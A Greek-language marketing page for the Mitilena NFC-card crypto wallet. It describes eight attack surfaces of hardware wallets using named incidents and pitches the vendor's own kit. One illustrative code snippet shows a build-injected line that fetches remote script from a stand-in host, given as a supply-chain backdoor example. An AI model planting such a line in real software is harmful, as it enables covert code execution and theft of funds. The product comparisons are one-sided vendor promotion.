8 τρύπες Ανοιχτός κώδικας Checklist FAQ
Mitilena Mitilena Wallet Cold crypto πορτοφόλι
ONLINE · 22.000+ ΝΟΜΙΣΜΑΤΑ Δημιούργησε πορτοφόλιΔημιούργησε
Hardware πορτοφόλια · μη προφανείς τρύπες

Μη προφανείς τρύπες ενός hardware πορτοφολιού

Αγοράζεις συσκευή για να κλείσεις τρύπες. Μαζί της έρχονται καινούργιες: firmware, ενημερώσεις, υπηρεσία στον υπολογιστή, οθόνη, κουτί, λογαριασμός κατασκευαστή. Οκτώ λεπτομέρειες που τα reviews βάζουν στα πλεονεκτήματα — και οκτώ τρόποι με τους οποίους έφυγαν χρήματα μέσα από αυτές το 2020–2026.

Πραγματικά περιστατικά με ημερομηνίες και ποσά Από τεκ��ηρίωση κατασκευαστών Βαθμολογούμε και το δικό μας kit με την ίδια λίστα
Κόστος του λάθουςδημόσιες υποθέσεις
2026Coldcard · αδύναμη τυχαιότητα στο firmware$100M+
2025Bybit · υπέγραψαν αυτό που δεν έβλεπαν$1.5B
2024Dark Skippy · το seed διαρρέει με δύο υπογραφέςέρευνα
2023Ledger Connect Kit · backdoor σε βιβλιοθήκη$600K
2021Ψεύτικη εφαρμογή πορτοφολιού στο App Store17,1 BTC
2020Διαρροή DB πελατών Ledger · phishing για χρόνια270.000 άνθρωποι
Οκτώ τρύπες

Κάθε λεπτομέρεια που επαινούν τα reviews είναι ξεχωριστή τρύπα

Ένα hardware πορτοφόλι κλείνει μία τρύπα: το κλειδί δεν κάθεται πια σε τηλέφωνο με internet. Αλλά η συσκευή δεν είναι άδεια. Έχει firmware, ενημερώσεις, πρόγραμμα desktop, οθόνη, κουτί, πωλητή με τη διεύθυνσή σου — και κάθε λεπτομέρεια προσθέτει επιφάνεια επίθεσης που πριν δεν είχες. Παρακάτω οκτώ τέτοιες λεπτομέρειες: τι λένε τα reviews, πώς έφυγαν χρήματα μέσα από αυτές, πώς κλείνει η τρύπα και αν το kit μας την έχει.

Τρύπα 01

Firmware που δημιουργεί το κλειδί σου

Στα reviews: «ασφαλές τσιπ — το κλειδί δημιουργείται μέσα στη συσκευή και δεν βγαίνει ποτέ»

Το κλειδί είναι ένας τεράστιος τυχαίος αριθμός, και τον φτιάχνει το firmware. Ένα bug εκεί — και τα πιθανά κλειδιά είναι πολύ λιγότερα απ’ όσα νομίζεις: γίνονται brute-force σε όλους τους κατόχους μαζί, χωρίς πρόσβαση στη συσκευή, χρόνια μετά την αγορά. Το τσιπ δεν μετράει· η τρύπα κάθεται από πάνω του.

Περιστατικό
$100M+
Coldcard, Ιούλιος 2026: bug στο build του firmware από το 2021 αντικατέστησε αθόρυβα το hardware RNG με αδύναμο, seeded από serial συσκευής και timer. Η ισχύς του κλειδιού έπεσε περίπου στα 40 bits· άδειασαν 5.000+ διευθύνσεις.
Πώς κλείνει η τρύπα
Αν μπορείς να φέρεις δική σου τυχαιότητα: ζάρια, δική σου φράση. Πορτοφόλι που δέχεται entropy από εσένα δεν εξαρτάται από ένα μόνο bug στο firmware.
Αυτή τη λεπτομέρεια δεν την έχουμε
Στην κάρτα δεν υπάρχει firmware — είναι κρυπτογραφημένος φορέας. Το Mitilena Air δημιουργεί το κλειδί από το system RNG της συσκευής, και μπορείς να βάλεις δική σου seed phrase αντί για τυχαίες λέξεις.
Τρύπα 02

Ενημερώσεις που σε υποχρεώνουν να εγκαταστήσεις

Στα reviews: «ο κατασκευαστής στέλνει τακτικά ενημερώσεις ασφαλείας»

Κάθε ενημέρωση είναι στιγμή όπου μπορεί να αντικατασταθεί το firmware. Παραποιημένο firmware κρύβει κομμάτια του seed σε δύο-τρεις συνηθισμένες υπογραφές, ενώ απ’ έξω η συσκευή φαίνεται κανονική. Να τις παραλείπεις επίσης δεν γίνεται: οι τρύπες κλείνουν με τις ίδιες ενημερώσεις.

Περιστατικό
2 υπογραφές
Dark Skippy, Αύγουστος 2024: ερευνητές έδειξαν ότι κακόβουλο firmware hardware πορτοφολιού μπορεί να εξάγει ολόκληρο το seed μέσα από δύο συναλλαγές. Αρκεί μία ενημέρωση από λάθος μέρος.
Πώς κλείνει η τρύπα
Από πού έρχεται το firmware και αν η συσκευή επαληθεύει την υπογραφή του. Το καλύτερο απ’ όλα: όταν δεν υπάρχει τίποτα να ενημερώσεις.
Αυτή τη λεπτομέρεια δεν την έχουμε
Στην κάρτα δεν υπάρχει τίποτα να ενημερώσεις ή να αντικαταστήσεις. Η υπογραφή γίνεται στην εφαρμογή του τηλεφώνου· τα builds είναι υπογεγραμμένα και έρχονται από App Store και Google Play — σαν οποιαδήποτε εφαρμογή που βλέπεις και κλείνεις μόνος σου.
Τρύπα 03 · Νιώσε τον παραλογισμό
Στα reviews: «βολική desktop εφαρμογή του κατασκευαστή»

Πορτοφόλι για δυσπιστία που έρχεται με υπηρεσία στο παρασκήνιο

Αγοράζεις συσκευή για έναν λόγο: να σταματήσεις να εμπιστεύεσαι τον υπολογιστή. Για να δουλέψει, πρέπει να εγκαταστήσεις υπηρεσία στο παρασκήνιο στον ίδιο υπολογιστή. Δεν την έγραψες, δεν την ξεκίνησες και δεν την ελέγχεις: ξεκινά με το OS, ακούει σε πόρτα που μπορεί να χτυπήσει οποιοδήποτε πρόγραμμα στη μηχανή σου, και αυτή τη στιγμή κάνει κάτι — τι ακριβώς, δεν ξέρεις και δεν θα επαληθεύσεις ποτέ.

Συνέχιζε να τρέχει στο παρασκήνιο αφού έκλεινες το πορτοφόλι. Για χρόνια. Σε έναν από τους μεγαλύτερους κατασκευαστές ήταν ξεχωριστή υπηρεσία «bridge»· το 2025 την έκρυψαν μέσα στην ίδια την εφαρμογή — η υπηρεσία είναι ακόμη εκεί, απλώς πεθαίνει με το παράθυρο. Για τους περισσότερους άλλους, χωρίς desktop πρόγραμμα η συσκευή είναι μπρελόκ. Σε Linux πρόσθεσε udev rules αλλιώς το σύστημα δεν παραδίδει το USB.

Άρα αυτό που αγόρασες για να μην εξαρτάσαι από προγράμματα υπολογιστή δεν δουλεύει χωρίς πρόγραμμα υπολογιστή. Και όχι αυτό που βλέπεις — αυτό που τρέχει από κάτω.

Αυτή τη λεπτομέρεια δεν την έχουμε
Στον υπολογιστή δεν εγκαθίσταται τίποτα: ούτε υπηρεσία, ούτε driver, ούτε πόρτα. Ο μεσάζων είναι το NFC chip που ήδη έχει το τηλέφωνό σου, φτιαγμένο από τον κατασκευαστή του και υπό τον έλεγχο του OS: δουλεύει μόνο όταν η εφαρμογή είναι ανοιχτή και εσύ αγγίζεις την κάρτα, και το τηλέφωνο ζητά άδεια κάθε φορά. Η κάρτα είναι παθητική: χωρίς μπαταρία, χωρίς ραδιόφωνο, δεν κάνει τίποτα μόνη της. Κλείσε την εφαρμογή — δεν μένει τίποτα που να τρέχει χωρίς εσένα. Ειλικρινά: εφαρμογή τηλεφώνου χρειάζεται ακόμη, και είναι σαν οποιαδήποτε άλλη — τη βλέπεις, την ανοίγεις και την κλείνεις μόνος σου. Κανείς δεν μένει στο βοηθητικό δωμάτιο.
Παρακολούθηση συστήματοςΠΟΡΤΟΦΟΛΙ ΚΛΕΙΣΤΟ
ΔιεργασίαΚατάστασηUptime
HW Wallet Appwallet
το έκλεισες εσύ-
hwwalletdυπηρεσία παρασκηνίου · USB bridge
τρέχει412d 06:14
ξεκίνησε από το σύστημα στο loginδεν κλείνει — είναι υπηρεσία
Mockup· τα ονόματα είναι ενδεικτικά. Έτσι έμοιαζε υπολογιστής με ένα από τα πιο δημοφιλή USB πορτοφόλια πριν το 2025· μετά το «bridge» μπήκε μέσα στην εφαρμογή — ίδια υπηρεσία, απλώς δεν φαίνεται πια στη λίστα.
Αλληγορία
Σπίτι για ιδιωτικότητα — και ένοικος στο βοηθητικό δωμάτιο

Ήθελες σπίτι για ιδιωτικότητα. Το αγόρασες. Μετά χρειαζόσουν ασφάλεια — εγκαταστάθηκε. Και για να δουλέψει το πλάνο ασφαλείας, σου ζήτησαν να αφήσεις στο σπίτι έναν με στολή που μένει όλο το εικοσιτετράωρο στο βοηθητικό, κρατά κλειδιά για κάθε πόρτα και αναφέρεται σε κάποιον άλλον. Δεν τον προσέλαβες, δεν μπορείς να τον απολύσεις, και τι κάνει τη νύχτα — δεν ξέρεις.

Είναι «δικός μας», φυσικά. Το λέει το συμβόλαιο. Ήθελες ιδιωτικότητα και πήρες υποκατάστατο: σπίτι με ένοικο που δεν διάλεξες.

Τρύπα 04 · Το open source δεν είναι audit
Στα reviews: «open source — μπορεί να το ελέγξει ο καθένας»

Το open source είναι τρόπος να δουλεύουν μαζί οι προγραμματιστές, όχι σήμα ότι το πρόγραμμα δεν κλέβει

Το open source εφευρέθηκε για να μοιράζονται οι άνθρωποι προγράμματα και να τα διορθώνουν μαζί. Ως εργαλείο συνεργασίας είναι εξαιρετικό. Ποτέ δεν ήταν σφραγίδα ποιότητας ότι «αυτό το λογισμικό δεν θα κλ��ψει τα λεφτά σου», και ιδού γιατί: δεν χρησιμοποιείς τον πηγαίο κώδικα. Χρησιμοποιείς αυτό που κατέβασες.

Ανάμεσα σε ένα GitHub repo και το αρχείο στο τηλέφωνό σου κάθονται το build, το app store, η ενημέρωση, ο server. Σε οποιοδήποτε από αυτά τα βήματα μπορεί να μπει μία γραμμή που τραβάει οτιδήποτε από οπουδήποτε — και δεν θα είναι στο repo. Δεν μπορείς να συγκρίνεις το αντίγραφό σου με την πηγή: τα stores στέλνουν compiled αρχείο· ένα web πορτοφόλι παίρνει όποιον κώδικα διάλεξε ο server να σου σερβίρει σήμερα· ένα browser extension ενημερώνεται αθόρυβα τη νύχτα.

«Ανοιχτό» σημαίνει ότι κάποιοι μπορούν να ελέγξουν κάποια έκδοση κάποια μέρα. Τι κάνει το αντίγραφό σου αυτή τη στιγμή — αυτό δεν το σημαίνει.

Στο repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Στο τηλέφωνό σου · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Μία γραμμή στο build. Όχι στο repo, αόρατη στο store, τρέχει στη συσκευή σου.
Η «ανοιχτότητα» δεν σταμάτησε καμία από αυτές τις υποθέσεις
Ledger Connect Kit2023
ανοιχτή βιβλιοθήκη στο GitHub· κακόβουλη έκδοση ανέβηκε στο npm· δεκάδες sites τη φόρτωσαν live μέσα σε ώρες
Copay / event-stream2018
ανοιχτό πορτοφόλι· το backdoor ήρθε μέσα από dependency στοχευμένο ειδικά σε αυτό
xz utils2024
ανοιχτό είκοσι χρόνια· backdoor κάθονταν στα releases μέχρι που ένας μηχανικός παρατήρησε ότι το SSH login ήταν μισό δευτερόλεπτο πιο αργό
Coldcard2026
open-source firmware· bug στο build για πέντε χρόνια αντικατέστησε το hardware RNG με αδύναμο — κλειδιά με brute-force χωρίς πρόσβαση στη συσκευή, 5.000+ διευθύνσεις, $100M+
Τι δουλεύει πραγματικά
Όχι το διάβασμα του κώδικα κάποιου άλλου — δύο έλεγχοι που μπορεί να τρέξει ο καθένας. Πρώτον, audit συμπεριφοράς: βάλε intercepting proxy στον υπολογιστή, πέρασε την εφαρμογή από εκεί και δες τι στέλνει πού. Δεν χρειάζεται να διαβάσεις κώδικα — το traffic φαίνεται ολόκληρο. Δεύτερον, αρχιτεκτονική όπου ο κώδικας δεν έχει τίποτα να κλέψει: αν το κλειδί δεν κάθεται ποτέ σε συσκευή με δίκτυο, οποιαδήποτε γραμμή σε οποιαδήποτε ενημέρωση είναι ανίσχυρη — δεν έχει τίποτα να στείλει.
Πώς το κάνουμε εμείς
Το πρώτο το προσφέρουμε οι ίδιοι: τρέξε την εφαρμογή μας μέσα από proxy, την web έκδοση από τα DevTools του browser, και δες κάθε αίτημα. Το κλειδί υπογραφής και το seed δεν θα εμφανιστούν· η μόνη εξαίρεση είναι το Monero view key — καλύπτεται στη σελίδα «πώς φεύγει μια μεταφορά». Το δεύτερο είναι στο kit: το κλειδί γεννιέται στο Mitilena Air σε συσκευή χωρίς internet, ζει στην κάρτα, και στην online εφαρμογή φτάνει μόνο η υπογραφή — εκεί δεν μένει τίποτα να περάσεις από proxy. Και το offline εδώ είναι αληθινό: σε air-gap mode η συσκευή του κλειδιού δεν συνδέεται πουθενά — ούτε καλώδιο, ούτε Bluetooth· η συναλλαγή μπαίνει και βγαίνει ως QR που βλέπεις με τα μάτια σου. Όχι «κρύο» πορτοφόλι σε καλώδιο κρεμασμένο από online υπολογιστή με δική του υπηρεσία που ανταλλάσσει ποιος-ξέρει-τι.
Τρύπα 05

Οθόνη που δεν δείχνει τι υπογράφεις

Στα reviews: «επιβεβαίωση στην οθόνη της συσκευής — ιός στον υπολογιστή είναι ανίσχυρος»

Η οθόνη είναι μικροσκοπική, και συχνά δείχνει hash ή «contract call», όχι διεύθυνση και ποσό. Επιβεβαιώνεις αυτό που δεν βλέπεις — και η υπογραφή είναι ειλικρινής, δική σου. Η οθόνη δίνει αίσθηση ελέγχου που δεν υπάρχει.

Περιστατικό
$1.5B
Bybit, Φεβρουάριος 2025: υπογράφοντες με hardware πορτοφόλια επιβεβαίωσαν μεταφορά που στο UI έμοιαζε συνηθισμένη. Οι συσκευές έδειχναν δεδομένα που άνθρωπος δεν μπορούσε να επαληθεύσει.
Πώς κλείνει η τρύπα
Παραλήπτης, ποσό και τύπος ενέργειας σε ανθρώπινη γλώσσα — όχι hash — και απόρριψη με ένα κουμπί.
Πώς το κάνουμε εμείς
Υπάρχει οθόνη, αλλά είναι η οθόνη του τηλεφώνου: διεύθυνση, ποσό και τύπος αιτήματος με λέξεις — μεταφορά, κλήση συμβολαίου, έγκριση — και κουμπί Απόρριψη. Για μεγάλα ποσά — ξεχωριστή offline συσκευή που δέχεται ολόκληρη τη συναλλαγή.
Τρύπα 06

Κουτί που ήδη περιέχει seed

Στα reviews: «έρχεται σε σφραγισμένο κουτί με σφραγίδα ασφαλείας»

Φυσική συσκευή σημαίνει αποστολή, μεσάζοντες και marketplaces «έκπτωσης». Το πορτοφόλι φτάνει προρυθμισμένο, με seed σε χαρτάκι μέσα. Ή μια όμοια εφαρμογή στο store σου ζητά να «βάλεις το seed για ενεργοποίηση».

Περιστατικό
17,1 BTC
App Store, 2021: κάτοχος hardware πορτοφολιού έβαλε το seed σε όμοια εφαρμογή και έχασε 17,1 BTC. Την ίδια χρονιά, μετά τη διαρροή DB, πελάτες Ledger έλαβαν με το ταχυδρομείο ψεύτικες συσκευές με γράμμα «μετακίνησε το seed στη νέα».
Πώς κλείνει η τρύπα
Αρχικοποίησέ το μόνος σου και μην χρησιμοποιήσεις ποτέ seed που ήρθε ήδη γραμμένο. Η σφραγίδα δεν είναι επαλήθευση· επαλήθευση είναι ότι δημιουργείς εσύ το κλειδί.
Πώς το κάνουμε εμείς
Οι κάρτες φτάνουν άδειες: δημιουργείς το κλειδί και το γράφεις εσύ — δεν μπορεί να υπάρχει έτοιμο seed στο κουτί. Η εφαρμογή έρχεται μόνο από App Store και Google Play μέσω συνδέσμων στο site· ζητά seed μόνο σε εισαγωγή και υπογραφή.
Τρύπα 07

Λογαριασμός κατασκευαστή

Στα reviews: «επίσημη εγγύηση, υποστήριξη και προσωπικός λογαριασμός»

Για να αγοράσεις τη συσκευή δίνεις στον κατασκευαστή όνομα, email και διεύθυνση αποστολής. Η ασφάλειά σου πλέον εξαρτάται από τη βάση τους. Αν διαρρεύσει — για χρόνια θα παίρνεις μηνύματα να «επιβεβαιώσεις το seed σε νέα συσκευή», κάποιες φορές με δέματα.

Περιστατικό
270.000 άνθρωποι
Ledger, 2020: διέρρευσαν δεδομένα 270.000 αγοραστών, συμπεριλαμβανομένων ταχυδρομικών διευθύνσεων. Emails, κλήσεις και δέματα που ζητούν να «μεταφέρεις» το seed συνεχίζονται μέχρι σήμερα.
Πώς κλείνει η τρύπα
Όσο λιγότερα ξέρουν για σένα, τόσο πιο κοντός ο φορέας: αγορά χωρίς λογαριασμό, υποστήριξη που δεν ζητά ποτέ seed, και ο κανόνας «μόνο κλέφτης ζητά το seed».
Αυτή τη λεπτομέρεια δεν την έχουμε
Το πορτοφόλι δουλεύει χωρίς εγγραφή — χωρίς λογαριασμό. Ο πωλητής ξέρει μόνο τη διεύθυνση αποστολής. Ούτε η υποστήριξη ούτε η εφαρμογή ζητούν seed.
Τρύπα 08

Μία συσκευή και ένα χαρτάκι

Στα reviews: «ανθεκτικό περίβλημα, μεγάλη οθόνη, μπαταρία για μία εβδομάδα»

Όσο περισσότερα μέρη, τόσο περισσότερες βλάβες: σύνδεσμος, οθόνη, μπαταρία. Η ανάκτηση κρέμεται από ένα χαρτάκι seed — βρεγμένο, χαμένο σε μετακόμιση, φωτογραφημένο «για παν ενδεχόμενο». Η πιο συχνή αιτία απώλειας δεν είναι το hack.

Περιστατικό
≈20 % BTC
Η Chainalysis υπολογίζει ότι περίπου το ένα πέμπτο όλου του bitcoin έχει χαθεί για πάντα — κυρίως από χαμένα κλειδιά, όχι από hacks.
Πώς κλείνει η τρύπα
Πόσα αντίγραφα κλειδιού έρχονται στο κουτί και σε ποια μορφή, τι γίνεται αν χαθεί η συσκευή, και αν υπάρχει κάτι μέσα που μπορεί να χαλάσει.
Αυτή τη λεπτομέρεια δεν την έχουμε
Ούτε οθόνη, ούτε μπαταρία, ούτε σύνδεσμος — τίποτα να χαλάσει. Και όχι ένα αντίγραφο: πέντε καθρέφτες στο κουτί — δύο NFC κάρτες και τρία stealth αυτοκόλλητα σε αδιάβροχο πλαστικό, διάρκεια 10+ χρόνια.
Checklist

Τι δεν πρέπει να υπάρχει σε ένα πορτοφόλι

Οκτώ λεπτομέρειες για οκτώ τρύπες. Η λίστα ταιριάζει σε οποιοδήποτε πορτοφόλι — hardware, mobile, browser. Τσέκαρε τι έχει αυτό που διαλέγεις — και το δικό μας.

01
Κλειδί που δημιουργείται μόνο από λογισμικόχωρίς δική σου τυχαιότητα — δική σου φράση ή ζάρια
02
Ενημερώσεις εκεί που ζει το κλειδίκάθε ενημέρωση είναι ευκαιρία να αντικατασταθεί κώδικας
03
Υπηρεσία, driver ή πόρτα στον υπολογιστήδες τρύπα 03
04
Σήμα «open source» αντί για αρχιτεκτονικήτο κλειδί κάθεται εκεί που φτάνει ξένος κώδικας
05
Οθόνη που δείχνει hash αντί για διεύθυνση και ποσόκαι χωρίς κουμπί Απόρριψη
06
Seed που ήρθε ήδη γραμμένοστο κουτί, σε γράμμα, σε «εφαρμογή ενεργοποίησης»
07
Λογαριασμός κατασκευαστήκαι υποστήριξη που μπορεί να ζητήσει το seed
08
Ένα μόνο αντίγραφο και μέρη που χαλούνοθόνη, μπαταρία, σύνδεσμος, ένα χαρτάκι
Σε αυτή τη λίστα, το Ultimate kit δεν έχει καμία από τις οκτώ λεπτομέρειες. Στο κουτί: 2 NFC κάρτες και 3 stealth αυτοκόλλητα, Mitilena Air (κλειδιά χωρίς internet) και Mitilena Keys (υπογραφή χωρίς internet). Οι κάρτες φτάνουν άδειες: δημιουργείς και κρυπτογραφείς το κλειδί — όχι εργοστασιακό τσιπ. Περιεχόμενα και τιμή →
Ultimate · offline kit

Όχι εργοστασιακό «secure chip» — φορέας που κρυπτογραφείς εσύ

Οι κάρτες φτάνουν άδειες. Δημιουργείς το κλειδί στο Mitilena Air σε τηλέφωνο χωρίς internet και το γράφεις εσύ. Η υπογραφή γίνεται με Mitilena Keys, επίσης offline: η συναλλαγή ταξιδεύει με QR. Πέντε ίδια αντίγραφα στο κουτί: 2 NFC κάρτες και 3 stealth αυτοκόλλητα σε αδιάβροχο πλαστικό. 18 δίκτυα, 20.000+ νομίσματα, συμπεριλαμβανομένου USDT.

Τίποτα δεν εγκαθίσταται στον υπολογιστή
Χωρίς firmware, ενημερώσεις, οθόνη ή μπαταρία
Συναλλαγή σε offline τηλέφωνο — με ήχο ή QR, χωρίς καλώδιο ή USB
Δουλεύει με τη δωρεάν εφαρμογή Mitilena στο τηλέφωνο
Αδιάβροχο πλαστικό, διάρκεια ζωής 10+ χρόνια
Αποστολή παγκοσμίως · mitilena-store.com
NFC κάρτα Mitilena
Ultimate · offline δημιουργία και υπογραφή
€369€439
2 NFC κάρτες · 3 stealth αυτοκόλλητα · Mitilena Air · άδεια Mitilena Keys
Αγόρασε Ultimate · €369 Basic και Premium — δες όλα τα πλάνα
FAQ

Τι ρωτάνε αφού διαβάσουν ως εδώ

Πλεονεκτήματα και μειονεκτήματα hardware πορτοφολιού — σύντομα;

Ένα μεγάλο πλεονέκτημα: το κλειδί δεν είναι σε τηλέφωνο με internet. Τα μειονεκτήματα είναι οι οκτώ λεπτομέρειες από πάνω — καθεμία προσθέτει επιφάνεια επίθεσης. Καλό hardware πορτοφόλι είναι αυτό με λιγότερες λεπτομέρειες, όχι με περισσότερες.

Κι αν το τηλέφωνο είναι παραβιασμένο;

Με κάρτα στο κύριο τηλέφωνο το κλειδί εμφανίζεται σε απομονωμένο περιβάλλον για το δευτερόλεπτο της υπογραφής — ίδιος κίνδυνος με οποιοδήποτε phone πορτοφόλι, απλώς πιο σύντομος. Για ποσά που σε τρομάζουν — δεύτερο επίπεδο: υπόγραψε σε ξεχωριστή offline συσκευή όπου η συναλλαγή φτάνει με QR.

Κι αν κλαπεί ή χαθεί η κάρτα;

Χωρίς τον κωδικό η κάρτα και το αυτοκόλλητο είναι άχρηστο πλαστικό — το κλειδί πάνω τους είναι κρυπτογραφημένο. Χαμένο αντίγραφο αντικαθίσταται από τα άλλα τέσσερα: δύο κάρτες και τρία αυτοκόλλητα από το κουτί είναι καθρέφτες.

Πρέπει να ενημερώνεις το firmware του hardware πορτοφολιού;

Αν ο κατασκευαστής έκλεισε τρύπα — ναι, και ακριβώς τότε μπορεί να αντικατασταθεί το firmware: έλεγξε την πηγή και την υπογραφή. Φορέας χωρίς firmware δεν έχει τέτοιο δίλημμα — τίποτα να ενημερώσεις, τίποτα να αντικαταστήσεις.

Πώς διαφέρει από USB πορτοφόλι;

Λιγότεροι μεσάζοντες: χωρίς καλώδιο, driver, υπηρεσία παρασκηνίου ή desktop πρόγραμμα. Ένας μεσάζων — το NFC chip του τηλεφώνου σου — και απαντά σε σένα και στο OS, όχι στον κατασκευαστή του πορτοφολιού.

Open source σημαίνει ασφαλές;

Σημαίνει ελέγξιμο από κάποιον, κάποτε. Δεν χρησιμοποιείς τον κώδικα αλλά αυτό που κατέβασες, και δεν μπορείς να συγκρίνεις το ένα με το άλλο. Η ασφάλεια έρχεται από αρχιτεκτονική όπου το κλειδί δεν είναι εκεί που φτάνει ξένος κώδικας.

NFC κάρτες με offline δημιουργία και υπογραφή

5 αντίγραφα κλειδιού · Air · Keys · ή δωρεάν πορτοφόλι σε 30 δευτερόλεπτα · Γιατί ένα «κρύο» hardware πορτοφόλι πάνω σε τσιπ είναι συχνά ψεύτικο →
Αγόρασε Ultimate · €369 Δημιούργησε δωρεάν πορτοφόλι